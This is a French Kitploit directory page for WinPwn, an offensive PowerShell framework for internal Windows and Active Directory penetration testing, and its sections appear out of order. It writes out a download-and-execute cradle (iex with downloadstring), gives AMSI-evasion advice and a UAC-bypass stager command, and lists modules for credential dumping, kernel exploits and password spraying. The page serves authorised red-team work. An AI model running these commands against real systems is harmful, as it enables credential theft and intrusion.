Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WinPwn — Automatisation pour les tests de pénétration Windows internes / Sécurité AD | Kitploit
Outils/GitHubGitHub/s3cur3th1ssh1t/winpwn
Frameworks de Tests d'IntrusionEscalade de PrivilègesReconnaissanceExploitationPost-ExploitationTests d'IntrusionRed Teaming
GitHubs3cur3th1ssh1t/winpwn

WinPwn

Automatisation pour les tests de pénétration Windows internes / Sécurité AD

Voir le dépôt
3.7k535il y a 11 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Sponsorisé par

     

WinPwn

Dans de nombreux tests de pénétration internes passés, j'avais souvent des problèmes avec les scripts PowerShell de reconnaissance/exploitation existants en raison du manque de support proxy. Je lançais aussi souvent les mêmes scripts les uns après les autres pour obtenir des informations sur le système actuel et/ou le domaine. Pour automatiser autant de processus de test de pénétration interne (reconnaissance ainsi qu'exploitation) et pour la raison du proxy, j'ai écrit mon propre script avec reconnaissance et intégration automatiques du proxy. Le script est principalement basé sur de grands projets PowerShell offensifs bien connus.

Toute suggestion, retour, Pull request et commentaire sont les bienvenus !

Importez simplement les modules avec :

Import-Module .\WinPwn.ps1 ou iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

Pour contourner AMSI, utilisez l'une des techniques de contournement existantes, trouvez le déclencheur AMSI et modifiez-le manuellement dans la fonction de contournement ou encodez la chaîne du déclencheur. Sinon, obfusquez l'ensemble du script.

Si vous vous retrouvez bloqué sur un système Windows sans accès Internet - aucun problème, utilisez simplement Offline_Winpwn.ps1, les scripts et exécutables les plus importants sont inclus.

Fonctions disponibles après import :

  • WinPwn -> Menu pour choisir les attaques :

alt text

  • Inveigh -> Exécute Inveigh dans une nouvelle fenêtre de console, attaques SMB-Relay avec gestion de session (Invoke-TheHash) intégrée

  • SessionGopher -> Exécute Sessiongopher en vous demandant des paramètres

  • Kittielocal ->

    • Version obfusquée d'Invoke-Mimikatz
    • Safetykatz en mémoire
    • Dump de lsass via la technique rundll32
    • Téléchargement et exécution de Lazagne obfusqué
    • Dump des identifiants du navigateur
    • Version personnalisée de Mimikittenz
    • Exfiltration des identifiants WiFi
    • Dump des hashes NTLM du fichier SAM
    • SharpCloud
  • Localreconmodules ->

    • Collecter les logiciels installés, les logiciels vulnérables, les partages, les informations réseau, les groupes, les privilèges et bien plus

Sans paramètres, la plupart des fonctions ne peuvent être utilisées qu'à partir d'un shell interactif. J'ai donc décidé d'ajouter les paramètres -noninteractive et -consoleoutput pour rendre le script utilisable depuis un framework C2 asynchrone comme Empire, Covenant, Cobalt Strike ou autres. De plus, le paramètre -repo a été ajouté pour utiliser WinPwn avec toutes ses fonctionnalités depuis un dépôt local. Ils peuvent être utilisés comme suit :

Usage:

-noninteractive -> Aucune question pour les fonctions, elles s'exécutent avec des paramètres prédéfinis ou définis par l'utilisateur

-consoleoutput -> Les dossiers loot/report ne sont pas créés. Chaque fonction renvoie la sortie vers la console afin que vous puissiez tout voir dans les journaux de l'agent de votre framework C2

Exemples :

WinPwn -noninteractive -consoleoutput -DomainRecon -> Cela renverra chaque script et fonction de reconnaissance de domaine et vous donnera probablement beaucoup de sortie

WinPwn -noninteractive -consoleoutput -Localrecon -> Cela énumérera autant d'informations que possible pour le système local

Generalrecon -noninteractive -> Exécute les fonctions de reconnaissance locale de base et stocke la sortie dans les dossiers correspondants

UACBypass -noninteractive -command "C:\temp\stager.exe" -technique ccmstp -> Exécute un stager dans un processus de haute intégrité depuis une session à faibles privilèges

Kittielocal -noninteractive -consoleoutput -browsercredentials -> Dump des identifiants du navigateur via Sharpweb en renvoyant la sortie vers la console

Kittielocal -noninteractive -browsercredentials -> Dump des hashes NTLM du fichier SAM et stocke la sortie dans un fichier

WinPwn -PowerSharpPack -consoleoutput -noninteractive -> Exécute Seatbelt, PowerUp, Watson et d'autres binaires C# en mémoire

Dotnetsearch -consoleoutput -noninteractive -> Recherche dans C:\Program Files\ et C:\Program Files (x86)\ les assemblys .NET

WinPwn -repo http://192.168.1.10:8000/WinPwn_Repo -> Utilise un serveur web local comme dépôt hors ligne pour utiliser WinPwn sans accès Internet

Get_WinPwn_Repo.sh:

Utilisation : ./Get_WinPwn_Repo.sh {Option}

Exemple : ./Get_WinPwn_Repo.sh --install

Options : --install Télécharger le dépôt et le placer dans ./WinPwn_Repo/ --remove Supprimer le dépôt ./WinPwn_Repo/ --reinstall Supprimer le dépôt et en télécharger un nouveau dans ./WinPwn_Repo/ --start-server Démarrer un serveur HTTP Python sur le port 8000 --help Afficher cette aide

À FAIRE

  • Une certaine obfuscation
  • Plus d'obfuscation
  • Support proxy via fichier PAC
  • Obtenir les scripts de mon propre dépôt de creds (https://github.com/S3cur3Th1sSh1t/Creds) pour être indépendant des changements dans les dépôts d'origine
  • Plus de fonctions de reconnaissance/exploitation
  • Ajouter un menu pour une meilleure gestion des fonctions
  • Contournement AMSI
  • Bloquer ETW

CRÉDITS

  • Kevin-Robertson - Inveigh, Powermad, Invoke-TheHash
  • Arvanaghi - SessionGopher
  • PowerShellMafia - Powersploit
  • Dionach - PassHunt
  • A-mIn3 - WINSpect
  • 411Hall - JAWS
  • sense-of-security - ADrecon
  • dafthack - DomainPasswordSpray
  • rasta-mouse - Sherlock, Contournement AMSI, PPID Spoof & BlockDLLs
  • AlessandroZ - LaZagne
  • samratashok - nishang

Stargazers over time

Stargazers over time

Avertissement légal :

L'utilisation de WinPwn pour attaquer des cibles sans consentement mutuel préalable est illégale. Il est de la responsabilité de l'utilisateur final de respecter toutes les lois locales, étatiques et fédérales applicables. Les développeurs déclinent toute responsabilité et ne sont pas responsables de toute utilisation abusive ou des dommages causés par ce programme. Utilisez-le uniquement à des fins éducatives.

Télécharger l’outil
  • Vérifier les vulnérabilités typiques comme SMB-Signing, LLMNR Poisoning, MITM6, WSUS over HTTP
  • Vérifier les journaux d'événements PowerShell pour les identifiants ou autres informations sensibles
  • Collecter les identifiants du navigateur et l'historique
  • Rechercher des mots de passe dans le registre et le système de fichiers
  • Trouver des fichiers sensibles (fichiers de configuration, fichiers RDP, bases de données Keepass)
  • Rechercher des binaires .NET sur le système local
  • Optionnel : Get-Computerdetails (Powersploit) et PSRecon
  • Domainreconmodules ->

    • Collecter diverses informations sur le domaine pour un examen manuel
    • Trouver les mots de passe AD dans les champs de description
    • Rechercher des fichiers de partage de domaine potentiellement sensibles
    • Énumérer les systèmes/utilisateurs avec délégation non contrainte
    • Générer un rapport Bloodhound
    • Scanner MS17-10 pour les systèmes du domaine
    • Scanner Bluekeep pour les systèmes du domaine
    • Découverte de serveurs SQL et fonctions d'audit - PowerUpSQL
    • Vérification MS-RPRN pour les contrôleurs de domaine ou tous les systèmes
    • Audit des stratégies de groupe avec Grouper2
    • Un rapport AD est généré dans des fichiers CSV (ou XLS si Excel est installé) avec ADRecon
    • Vérifier les imprimantes pour les vulnérabilités courantes
    • Rechercher des chemins d'attaque de délégation contrainte basée sur les ressources
    • Vérifier tous les DC pour zerologon - CVE-2020-1472
    • Et plus encore, jetez un œil
  • Privescmodules

    • Invoke-PrivescCheck de itm4n
    • winPEAS
    • PowerUp Allchecks de Powersploit, Sherlock, GPPPasswords
    • Détournement de DLL, permissions de fichiers, permissions de registre et clés faibles, vérification Rotten/Juicy Potato
  • kernelexploits ->

    • MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) x86 uniquement !
    • MS16-032 - (2008/7/8/10/2012) !
    • MS16-135 - (WS2k16 uniquement) !
    • CVE-2018-8120 - Mai 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1 !
    • CVE-2019-0841 - Avril 2019 !
    • CVE-2019-1069 - Polarbear Hardlink, identifiants nécessaires - Juin 2019 !
    • CVE-2019-1129/1130 - Race Condition, plusieurs cœurs nécessaires - Juillet 2019 !
    • CVE-2019-1215 - Septembre 2019 - x64 uniquement !
    • CVE-2020-0638 - Février 2020 - x64 uniquement !
    • CVE-2020-0796 - SMBGhost
    • CVE-2020-0787 - Mars 2020 - toutes les versions Windows
    • CVE-2021-34527/CVE-2021-1675 - Juin 2021 - PrintNightmare
    • CVE-2021-40449 - CallbackHell - Octobre 2021
    • Juicy-Potato Exploit
    • Printspoofer de itm4n
  • UACBypass ->

    • UAC Magic, basé sur l'article en trois parties de James Forshaw sur l'UAC
    • Technique de contournement UAC cmstp, par Oddvar Moe
    • Contournement UAC via DiskCleanup, par James Forshaw
    • Technique DccwBypassUAC, par Ernesto Fernandez et Thomas Vanhoutte
  • SYSTEMShell ->

    • Invoquer un shell système via CreateProcess
    • Invoquer un shell système via l'emprunt de tube nommé
    • Invoquer un shell système via la manipulation de jetons
    • Lier un shell système via le chargement de DLL UsoClient ou CreateProcess
  • Shareenumeration -> Invoke-Filefinder et Invoke-Sharefinder (Powerview / Powersploit)

  • Domainshares -> Recherche Snaffler ou Passhunt sur tous les systèmes du domaine

  • Groupsearch -> Get-DomainGPOUserLocalGroupMapping - trouver les systèmes où vous avez un accès administrateur ou RDP via le mappage de stratégie de groupe (Powerview / Powersploit)

  • Kerberoasting -> Exécute Invoke-Kerberoast dans une nouvelle fenêtre et stocke les hashes pour un craquage ultérieur

  • PowerSQL -> Découverte de serveurs SQL, vérifier l'accès avec l'utilisateur actuel, auditer les identifiants par défaut + attaques d'injection de chemin UNC

  • Sharphound -> Rapport Bloodhound 3.0

  • Adidnsmenu -> Créer ou supprimer des nœuds DNS intégrés à Active Directory

  • MS17-10 -> Analyser les serveurs Windows actifs du domaine ou tous les systèmes pour la vulnérabilité MS17-10 (Eternalblue)

  • Sharpcradle -> Charger des fichiers C# depuis un serveur Web distant en mémoire

  • DomainPassSpray -> Attaques DomainPasswordSpray, un mot de passe pour tous les utilisateurs du domaine

  • Bluekeep -> Scanner Bluekeep pour les systèmes du domaine

  • leechristensen - Random Repo, Spoolsample, autres scripts ps1
  • HarmJ0y - De nombreux bons articles de blog, Gists et scripts, tous les binaires Ghostpack
  • NETSPI - PowerUpSQL
  • Cn33liz - p0wnedShell
  • rasta-mouse - AmsiScanBufferBypass
  • l0ss - Grouper2,Snaffler,Grouper3
  • dafthack - DomainPasswordSpray
  • enjoiz - PrivEsc
  • itm4n - Invoke-PrivescCheck & PrintSpoofer
  • James Forshaw - UACBypasses
  • Oddvar Moe - UACBypass
  • Carlos Polop - winPEAS
  • gentilkiwi - Mimikatz, Kekeo
  • hlldz - Invoke-Phantom
  • Matthew Graeber - de nombreux scripts Ps1 qui sont presque utilisés partout
  • Steve Borosh - Misc-Powershell-Scripts, SharpPrinter, SharpSSDP
  • Sean Metcalf - SPN-Scan + de nombreux articles utiles sur adsecurity.org
  • @l0ss and @Sh3r4 - Snaffler
  • FSecureLABS - GPO Tools
  • vletoux - PingCastle Scanners
  • NCCGroup + BC-Security - ZeroLogon Scanner
  • All people working on Bloodhound - SharpHound Collector
  • klezVirus - SharpLdapRelayScan
  • cube0x0 - LdapSignCheck + autres outils
  • @s4ntiago_p - NanoDump
  • @thefLinkk - Handlekatz
  • @Mayyhem - SharpSCCM
  • @cube0x0 - LdapSignCheck
  • @klezVirus - SharpLdapRelayScan
  • @HarmJ0y, @leechristensen, @CCob - Certify
  • @Yudasm - ShadowHound
  • Beaucoup d'autres personnes de la communauté - Je suis sûr d'avoir oublié de nombreuses autres personnes qui ont indirectement contribué à ce script